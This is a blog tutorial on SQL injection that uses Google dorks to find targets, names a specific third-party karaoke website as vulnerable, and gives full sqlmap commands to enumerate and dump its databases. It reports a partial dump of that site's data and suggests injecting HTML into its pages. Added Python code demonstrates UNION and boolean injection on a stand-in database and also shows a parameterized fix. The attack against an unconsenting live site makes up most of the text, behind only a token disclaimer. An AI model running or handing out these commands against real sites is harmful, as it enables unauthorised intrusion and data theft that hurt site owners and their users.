Hacking remote database using SQL injection


What is SQL Injection

 

SQL injection is a technique for injecting malicious SQL into a query that a website builds from untrusted input, typically a query-string parameter, without sanitizing or parameterizing it. Using SQL injection, one can take over a vulnerable website by reading all of its data, defacing it, tampering with existing data and a lot more. SQL injection attacks are extremely dangerous, and vulnerable websites are at high risk of leaking confidential data, which affects them as well as all their stakeholders.

In this blog, I will show you how to find a website vulnerable to SQL injection and then exploit the vulnerability using a tool called SQLMap.

 

We are going to use Google dorks to find a vulnerable website. If you don't know what Google dorks are, please read my previous blog here.

 

Let's use a simple Google dork to find candidate SQLi sites, as below:

inurl:index.php?id=

The above returns a large number of search results. None of them is obviously vulnerable, but each is a good candidate for SQL injection testing: an id parameter is almost always used as a database key, and if the site does not sanitize (or, better, parameterize) the query string, the injected SQL will be executed.

 

Quick check to find SQL injection vulnerability

 


Out of the search results returned by the above Google search, I spotted a website, karaoke.co.nz, vulnerable to SQL injection. Visiting the URL http://karaoke.co.nz/items/index.php?id=37 and then appending a single quote at the end of it shows that the site does not sanitize query strings properly. Check this URL:

http://karaoke.co.nz/items/index.php?id=37'

which gives the below error:

    Unable to query local database to select Identifier
    You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''' at line 1
    select * from Category where Identifier = 37'

This one error page leaks everything needed for the next step: the back end is MariaDB (so SQLMap can be told --dbms=mysql), the exact query that is run, and the fact that the id is concatenated into it unquoted, as an integer. That last point means a quote is not even required to inject: 37 OR 1=1 or 37 UNION SELECT ... goes straight into the statement.
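The quick check in code, as an added example that is not part of the original post: it reproduces the concatenated query the error message exposes, sends the three probes a tester tries by hand (stray quote, true/false condition pair, tautology), and shows the parameterized version that the site should have used. An in-memory SQLite database stands in for the site's MariaDB server; the table name Category and column Identifier come from the leaked query, and the rows are constructed sample data.

```python
"""Added example (not from the original post): why appending a single quote
to ?id=37 yields the SQL syntax error shown above, why a true/false pair of
conditions behaves differently, and what the parameterized fix looks like.
An in-memory SQLite database stands in for the site's MariaDB server; the
table Category and column Identifier are taken from the leaked query, the
rows are constructed sample data."""
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed rows; only the table/column names come from the leaked query.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Category (Identifier INTEGER, Name TEXT)")
    conn.executemany("INSERT INTO Category VALUES (?, ?)",
                     [(36, "Pop"), (37, "Rock"), (38, "Country")])
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, raw_id: str) -> list:
    """The pattern the error message reveals: the query-string value is
    concatenated straight into the SQL text, so whatever the client sends
    becomes part of the statement."""
    sql = "select * from Category where Identifier = " + raw_id
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, raw_id: str) -> list:
    """Hardened form: validate the type, then bind the value as a parameter.
    The database never sees the input as SQL, so 37' is just a bad id."""
    if not raw_id.isdigit():
        return []
    return conn.execute("select * from Category where Identifier = ?",
                        (int(raw_id),)).fetchall()


def quick_check(conn: sqlite3.Connection) -> dict:
    """The three manual probes (sqlmap's error-based and boolean-based
    detection do the same thing automatically)."""
    result = {}
    try:                                   # probe 1: the stray quote
        lookup_vulnerable(conn, "37'")
        result["quote_error"] = False
    except sqlite3.OperationalError:       # MariaDB: "You have an error in your SQL syntax"
        result["quote_error"] = True
    # probe 2: same id, true vs. false condition; different row counts mean
    # the server is evaluating our condition, even if no error is shown.
    true_rows = lookup_vulnerable(conn, "37 AND 1=1")
    false_rows = lookup_vulnerable(conn, "37 AND 1=2")
    result["boolean_diff"] = len(true_rows) != len(false_rows)
    # probe 3: tautology; no quote needed because the id is an unquoted integer.
    result["tautology_rows"] = len(lookup_vulnerable(conn, "37 OR 1=1"))
    return result
```

Running quick_check(make_db()) gives quote_error True, boolean_diff True and tautology_rows 3, while lookup_safe() returns the single matching row for "37" and nothing at all for any of the three probes. The boolean pair is worth remembering: it still detects the injection on sites that hide database errors, which is why SQLMap's default technique list starts with B (boolean-based blind).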

 

Below is a partial dump of one of the DB tables of this site (figure: SQLMAP DUMP):

To use SQLMap, download and install Python first from here. Once done, download and install SQLMap from here.

Once installed, go to the location where SQLMap is installed and type the below command to get familiar with SQLMap:

 

sqlmap.py --help
 
It will show the basic help below with the most commonly used options (-hh prints the full list):
        ___
       __H__
 ___ ___[.]_____ ___ ___  {1.1.3.11#dev}
|_ -| . [)]     | .'| . |
|___|_  [.]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org
 
Usage: sqlmap.py [options]
 
Options:
  -h, --help            Show basic help message and exit
  -hh                   Show advanced help message and exit
  --version             Show program's version number and exit
  -v VERBOSE            Verbosity level: 0-6 (default 1)
 
  Target:
    At least one of these options has to be provided to define the
    target(s)
 
    -u URL, --url=URL   Target URL (e.g. "http://www.site.com/vuln.php?id=1")
    -g GOOGLEDORK       Process Google dork results as target URLs
 
  Request:
    These options can be used to specify how to connect to the target URL
 
    --data=DATA         Data string to be sent through POST
    --cookie=COOKIE     HTTP Cookie header value
    --random-agent      Use randomly selected HTTP User-Agent header value
    --proxy=PROXY       Use a proxy to connect to the target URL
    --tor               Use Tor anonymity network
    --check-tor         Check to see if Tor is used properly
 
  Injection:
    These options can be used to specify which parameters to test for,
    provide custom injection payloads and optional tampering scripts
 
    -p TESTPARAMETER    Testable parameter(s)
    --dbms=DBMS         Force back-end DBMS to this value
 
  Detection:
    These options can be used to customize the detection phase
 
    --level=LEVEL       Level of tests to perform (1-5, default 1)
    --risk=RISK         Risk of tests to perform (1-3, default 1)
 
  Techniques:
    These options can be used to tweak testing of specific SQL injection
    techniques
 
    --technique=TECH    SQL injection techniques to use (default "BEUSTQ")
 
  Enumeration:
    These options can be used to enumerate the back-end database
    management system information, structure and data contained in the
    tables. Moreover you can run your own SQL statements
 
    -a, --all           Retrieve everything
    -b, --banner        Retrieve DBMS banner
    --current-user      Retrieve DBMS current user
    --current-db        Retrieve DBMS current database
    --passwords         Enumerate DBMS users password hashes
    --tables            Enumerate DBMS database tables
    --columns           Enumerate DBMS database table columns
    --schema            Enumerate DBMS schema
    --dump              Dump DBMS database table entries
    --dump-all          Dump all DBMS databases tables entries
    -D DB               DBMS database to enumerate
    -T TBL              DBMS database table(s) to enumerate
    -C COL              DBMS database table column(s) to enumerate
 
  Operating system access:
    These options can be used to access the back-end database management
    system underlying operating system
 
    --os-shell          Prompt for an interactive operating system shell
    --os-pwn            Prompt for an OOB shell, Meterpreter or VNC
 
  General:
    These options can be used to set some general working parameters
 
    --batch             Never ask for user input, use the default behaviour
    --flush-session     Flush session files for current target
 
  Miscellaneous:
    --sqlmap-shell      Prompt for an interactive sqlmap shell
    --wizard            Simple wizard interface for beginner users
 
Use the below SQLMap commands to enumerate and then dump the databases of the vulnerable site. Quote the URL so the shell does not interpret the ? and & characters. The --cookie option is only required when the page needs a valid session to answer; a PHPSESSID value is tied to one browser session, so capture your own from the browser or drop the option altogether.

First list the databases the injected query can reach:

python d:\sqlmap\sqlmap.py -u "http://www.karaoke.co.nz/items/index.php?id=37" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" --dbs

The above will return the database names, claireg_karaoke and information_schema in this case. information_schema is the server's own catalogue and is present on every MySQL/MariaDB instance; claireg_karaoke is the application database, which is where the site's data lives.

Use the below commands to get the list of tables in each database (-D selects the database; --dbs is no longer needed once you know the names):

python d:\sqlmap\sqlmap.py -u "http://www.karaoke.co.nz/items/index.php?id=37" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" -D claireg_karaoke --tables
python d:\sqlmap\sqlmap.py -u "http://www.karaoke.co.nz/items/index.php?id=37" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" -D information_schema --tables

Once we have table names, let's get the column names with -T and --columns, replacing <table name> with one of the tables from the previous step:

python d:\sqlmap\sqlmap.py -u "http://www.karaoke.co.nz/items/index.php?id=37" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" -D claireg_karaoke -T <table name> --columns
python d:\sqlmap\sqlmap.py -u "http://www.karaoke.co.nz/items/index.php?id=37" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" -D information_schema -T <table name> --columns

The above two commands return the columns of the table given to -T. Once we have all the info dumped, we can use it in whatever way we need.

Once you have the column names, you can dump their values with -C (a comma-separated list of columns, no spaces) and --dump. For the PLUGINS table of information_schema:

python d:\sqlmap\sqlmap.py -u "http://www.karaoke.co.nz/items/index.php?id=37" --cookie="security=low; PHPSESSID=e8495b455c5ef26c415ab480425135ee" -D information_schema -T PLUGINS -C LOAD_OPTION,PLUGIN_AUTH_VERSION,PLUGIN_AUTHOR,PLUGIN_DESCRIPTION,PLUGIN_LIBRARY,PLUGIN_LIBRARY_VERSION,PLUGIN_LICENSE,PLUGIN_MATURITY,PLUGIN_NAME,PLUGIN_STATUS,PLUGIN_TYPE,PLUGIN_TYPE_VERSION,PLUGIN_VERSION --dump

It's also possible to dump every table of every database in one go with the option --dump-all, but prefer targeted -T/-C dumps: they take far fewer requests, and on a blind injection every extracted character costs several requests.
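What the --tables, --columns and --dump steps above actually do on the wire, as an added example that is not part of the original post: UNION-based injection against the same "select * from Category where Identifier = <id>" query, done by hand. The column count is found with ORDER BY, then the catalogue tables are read through a UNION SELECT padded with NULLs. An in-memory SQLite database stands in for MariaDB, so sqlite_master and pragma_table_info() play the role of information_schema.tables and information_schema.columns; the Users table, its rows and the hashes in it are constructed sample data.

```python
"""Added example (not from the original post): the UNION-based enumeration
that sqlmap's --tables, --columns and --dump options automate, done by hand
against the same 'select * from Category where Identifier = <id>' query.
An in-memory SQLite database stands in for MariaDB, so sqlite_master and
pragma_table_info() play the role of information_schema.tables and
information_schema.columns; every table, row and hash below is constructed."""
import sqlite3


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Category (Identifier INTEGER, Name TEXT, Notes TEXT)")
    conn.execute("INSERT INTO Category VALUES (37, 'Rock', 'constructed row')")
    conn.execute("CREATE TABLE Users (username TEXT, password_hash TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?)",
                     [("admin", "5f4dcc3b5aa765d61d8327deb882cf99"),
                      ("claire", "e10adc3949ba59abbe56e057f20f883e")])
    return conn


def vulnerable_query(conn: sqlite3.Connection, raw_id: str) -> list:
    # Same string-concatenation flaw that the leaked error message exposes.
    return conn.execute("select * from Category where Identifier = " + raw_id).fetchall()


def count_columns(conn: sqlite3.Connection, max_cols: int = 20) -> int:
    """Step 1: 'ORDER BY n' succeeds while n <= column count and errors after,
    which tells us how many columns an injected UNION SELECT must supply."""
    for n in range(1, max_cols + 1):
        try:
            vulnerable_query(conn, f"37 ORDER BY {n}")
        except sqlite3.OperationalError:
            return n - 1
    raise RuntimeError("column count not found")


def _pad(fields: list, ncols: int) -> str:
    """Pad the injected SELECT list with NULLs to match the column count."""
    return ", ".join(fields + ["NULL"] * (ncols - len(fields)))


def list_tables(conn: sqlite3.Connection, ncols: int) -> list:
    """--tables. An impossible id (-1) makes the original SELECT return nothing,
    so every row that comes back is ours."""
    rows = vulnerable_query(conn, "-1 UNION SELECT " + _pad(["name"], ncols)
                            + " FROM sqlite_master WHERE type='table'")
    return sorted(r[0] for r in rows)


def list_columns(conn: sqlite3.Connection, ncols: int, table: str) -> list:
    """--columns for one table (information_schema.columns on MariaDB)."""
    rows = vulnerable_query(conn, "-1 UNION SELECT " + _pad(["name"], ncols)
                            + f" FROM pragma_table_info('{table}')")
    return sorted(r[0] for r in rows)


def dump(conn: sqlite3.Connection, ncols: int, table: str, columns: list) -> list:
    """--dump: the -T table and -C column list pulled out through the UNION."""
    rows = vulnerable_query(conn, "-1 UNION SELECT " + _pad(list(columns), ncols)
                            + f" FROM {table}")
    return sorted(tuple(r[:len(columns)]) for r in rows)
```

With the constructed schema, count_columns() returns 3, list_tables() returns Category and Users, list_columns() on Users returns its two column names, and dump() returns both username/password_hash rows. Against MariaDB the only changes are the catalogue names (information_schema.tables, information_schema.columns) and the need to bypass any output filtering; SQLMap's U technique is exactly this loop with those substitutions, and it falls back to blind techniques when the page does not render the UNION rows.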

 

What more can be done with this vulnerability? Let's try to manipulate the query string and change the HTML of the page.

Since the website also echoes the query-string value back into the page (visible in the error message above), we can insert an image into the HTML page by tampering with the query string. That is HTML injection rather than SQL injection, but it stems from the same unvalidated parameter. The below link shows the exploit

 

 

Happy hacking!!

 

Disclaimer:- The content is for educational purpose only. Any unethical usage of the info on this website is not my responsibility.

 


 



An avid reader, responsible for generating creative content ideas for golibrary.co. His interests include algorithms and programming languages. Blogging is a hobby and passion.
